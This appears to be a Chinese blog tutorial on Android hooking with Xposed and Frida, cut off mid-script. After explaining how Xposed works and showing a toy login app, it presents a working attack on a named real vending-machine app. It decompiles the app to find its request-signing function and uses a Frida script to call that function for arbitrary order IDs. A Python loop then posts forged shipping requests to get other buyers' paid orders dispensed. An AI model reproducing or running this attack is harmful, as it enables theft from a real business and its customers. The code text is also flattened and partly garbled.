【移动应用开发技术】浅谈android hook技术

【移动应用开发技术】浅谈androidhook技术

Xposed在开机的时候完成对所有的HookFunction的劫持，在原Function执行的前后加上自定义代码，很多人将这个框架用在对android的私有化定制上面，其实在android安全测试方面这个框架提供了很大的便利，xposed主要是对方法的hook，在以往的重打包技术中，需要对smali代码的进行修改，修改起来比较麻烦。利用xposed框架可以很容易的获取到android应用中的信息，比如加密私钥、salt值等等，不需要反编译获取密钥转换算法、不需要了解密钥保存机制，直接hook函数，获取输入输出就可以。原理

在Android系统中，应用程序进程都是由Zygote进程孵化出来的，而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例，每当它孵化一个新的应用程序进程时，都会将这个Dalvik虚拟机实例复制到新的应用程序进程里面去，从而使得每一个应用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择替换app_process的原因。Zygote进程在启动的过程中，除了会创建一个Dalvik虚拟机实例之外，还会将Java运行时库加载到进程中来，以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。注意，一个应用程序进程被Zygote进程孵化出来的时候，不仅会获得Zygote进程中的Dalvik虚拟机实例拷贝，还会与Zygote一起共享Java运行时库。这也就是可以将XposedBridge这个jar包加载到每一个Android应用程序中的原因。XposedBridge有一个私有的Native（JNI）方法hookMethodNative，这个方法也在app_process中使用。这个函数提供一个方法对象利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行分析，不得不说，作者对于android的机制和java的了解已经相当深入了。简单实例

很简单的一个android登入代码：

publicclassMainActivityextendsAppCompatActivity{private

TextView

accountView;

private

TextView

passwdView;

private

Button

loginBut;

private

Button

quitBut;

@Override

protected

void

onCreate(Bundle

savedInstanceState)

{

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

accountView

=

(TextView)

findViewById(R.id.account);

passwdView

=

(TextView)

findViewById(R.id.pwd);

loginBut

=

(Button)

findViewById(R.id.login);

quitBut

=

(Button)

findViewById(R.id.quit);

loginBut.setOnClickListener(new

View.OnClickListener()

{

@Override

public

void

onClick(View

v)

{

String

username

=

accountView.getText()

+

"";

String

password

=

passwdView.getText()

+

"";

if(isCorrectInfo(username,password)){

Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show();

}

else{

Toast.makeText(MainActivity.this,"登入失败",Toast.LENGTH_LONG).show();

}

}

});

}

public

boolean

isCorrectInfo(String

username,

String

password)

{

if(username.equals("admin")

&&

password.equals("passwd")){

return

true;

}

else{

return

false;

}

}}

很简单的就是判断下用户输入的用户名和密码是正确，这里做个简单的演示，将用户输入的用户名和密码信息hook出来不管正确与否

简单说下xposed模块的开发，首先需要的是导入api，具体的可以参考：/rovo89/XposedBridge/wiki/Using-the-Xposed-Framework-API

在manifest中定义

importfrida,sys#引入frida类

importlogginglogging.basicConfig(filename=’test.log’,level=logging.INFO)reload(sys)

sys.setdefaultencoding(‘utf-8’)#对输出进行utf8的编码

printsys.getdefaultencoding()defprint_result(message):#对输出的信息进行打印

printmessage

(message)defon_message(message,data):#反调函数，用来接受message的信息，message后面会说到

try:

print_result(message=message)

except:

passdid=“255601452”#订单id

time=“1472706588”#时间戳jscode=“””#核心代码，这段主要是调用app中的相应处理函数，后面会分析这段代码的来源Dalvik.perform(function(){#说明是Dalvik平台

varcurrentApplication=Dalvik.use(“android.app.ActivityThread”).currentApplication();

varcontext=currentApplication.getApplicationContext();

varsignclass=Dalvik.use(“com.ub.main.d.e”);#调用com.ub.main.d.e类

varsignInstance=signclass.$new(context);#反射创建一个新的对象

varsign=signInstance.a(“255601452”);#调用对象的a函数

send(sign);#将调用函数的结果发送出来

});

“”“process=frida.get_device_manager().enumerate_devices()[-1].attach(“com.ub.main”)#获取连接的设备并枚举取最后一个设备连接，并附到com.ub.main的进程上面printprocessscript=process.create_script(jscode)#调用相应的js函数，获取函数调用后的结果值

script.on(‘message’,on_message)#利用回调，将message传递给on_message函数

print“done”

script.load()反编译获取app中的核心函数

对于上面的js代码，其实就是调用app中的某个函数，比如sign值生成函数，加密解密函数，不需要自己单独的去分析算法流程，分析key值在哪，直接调用app的相应函数，让app帮我们完成这些工作

这里我们分析的app是友宝，这是一款饮料售货机，当时抓包看到提货的时候是只有个订单id的，猜想是不是遍历订单的id，支付成功但是没有取货的订单会不会响应请求，自己掉货出来

下面对友宝的订单进行分析过程1、抓取支付订单成功链接

/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4

postdata：sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh4rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588分析：sign是校验值，主要是防止订单伪造的，orderid是产生的支付订单id，这个主要是防止伪造用2、反编译友宝app

找到morder/shipping所在的包为：com/ub/main/d/e.class

其中localStringBuffer存储的就是url中的参数信息，该请求查找到的代码在a()

StringBufferlocalStringBuffer=newStringBuffer();

localStringBuffer.append(“clientversion”);

localStringBuffer.append(“=”);

try

{

localStringBuffer.append(Uri.encode(this.e.getPackageManager().getPackageInfo(this.e.getPackageName(),0).versionName));

localStringBuffer.append(“&”);

localStringBuffer.append(“machine_type”);

localStringBuffer.append(“=”);

localStringBuffer.append(Uri.encode(Build.MODEL));

localStringBuffer.append(“&”);

localStringBuffer.append(“os”);

localStringBuffer.append(“=”);

localStringBuffer.append(Uri.encode(Build.VERSION.RELEASE));

localStringBuffer.append(“&”);

localStringBuffer.append(“channel_id”);

localStringBuffer.append(“=”);

localStringBuffer.append(this.g.u());

localStringBuffer.append(“&”);

localStringBuffer.append(“device_no”);

localStringBuffer.append(“=”);

ObjectlocalObject1=“”;

try

{

Stringstr5=Uri.encode(i.a(this.e));

localObject1=str5;

}

catch(ExceptionlocalException1)

{

ObjectlocalObject2;

for(;;){}

}

localStringBuffer.append((String)localObject1);

localStringBuffer.append(“&”);

localStringBuffer.append(“imei”);

localStringBuffer.append(“=”);

localObject2=“”;

try

{

Stringstr4=Uri.encode(i.b(this.e));

localObject2=str4;

}

catch(ExceptionlocalException2)

{

booleanbool;

Stringstr1;

Stringstr2;

Stringstr3;

for(;;){}

}

localStringBuffer.append((String)localObject2);

localStringBuffer.append(“&”);

localStringBuffer.append(“device_id”);

localStringBuffer.append(“=”);

localStringBuffer.append(Uri.encode(“2”));

localStringBuffer.append(“&”);

localStringBuffer.append(“u”);

localStringBuffer.append(“=”);

localStringBuffer.append(Uri.encode(this.f.c()));

localStringBuffer.append(“&”);

localStringBuffer.append(“wake_id”);

localStringBuffer.append(“=”);

localStringBuffer.append(“0”);

localStringBuffer.append(“&”);

localStringBuffer.append(“net_type”);

localStringBuffer.append(“=”);

localStringBuffer.append(i.g(this.e));

localStringBuffer.append(“&”);

localStringBuffer.append(“carrier_type”);

localStringBuffer.append(“=”);

localStringBuffer.append(i.h(this.e));

bool=this.f.f();

str1=this.f.l();

str2=this.f.m();

if(bool)

{

str3=“4”;

l.a(“weipeipei”,“get参数—->isUboxAccount=”+bool+“,s=”+str3);

localStringBuffer.append(“&”);

localStringBuffer.append(“s”);

localStringBuffer.append(“=”);

localStringBuffer.append(str3);

returnlocalStringBuffer.toString().trim();

}

}

catch(PackageManager.NameNotFoundExceptionlocalNameNotFoundException)

{

for(;;)

{

localNameNotFoundException.printStackTrace();

continue;

if((str1!=null)&&(!str1.trim().equals(“”))){

str3=“2”;

}elseif((str2!=null)&&(!str2.trim().equals(“”))){

str3=“3”;

}else{

str3=“0”;

}

}

}

}

生成签名的函数在com/ub/main/d/e.class中的b函数

publicStringb(String[][]paramArrayOfString)输入的是一个array

上面的请求函数在：

publicStringa(StringparamString)

{

String[][]arrayOfString=newString[2][];

arrayOfString[0]={“orderId”,paramString};

String[]arrayOfString1=newString[2];

arrayOfString1[0]=“timestamp”;

arrayOfString1[1]=d;

arrayOfString[1]=arrayOfString1;

returnb(arrayOfString);

}最后加上sign值，发送请求3、可以反编译出他的sign计算方法，也可以直接调用b函数来产生sign值，后来发现app会自动取时间戳，我们就不需要给他array型的参数，直接调用a函数，把orderId给他，让他直接return一个值出来就好了，就有了上面的js代码4、自动化的批量处理

看代码importfrida,sys

importlogging

importrequestslogging.basicConfig(filename=’test.log’,level=logging.INFO)reload(sys)

sys.setdefaultencoding(‘utf-8’)classubox:

def

init(self):

passdef

request(self,

payload):

#

print

"requests"

dict

=

{}

url

=

"/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4"

for

i

in

payload.split("&"):

key

=

i.split("=")[0]

value

=

i.split("=")[1]

dict[key]

=

value

data=dict

r=requests.post(url=url,data=data)

print

r.text

def

print_result(self,

message):

#

print

message

payload

=

message["payload"]

print

payload

self.requ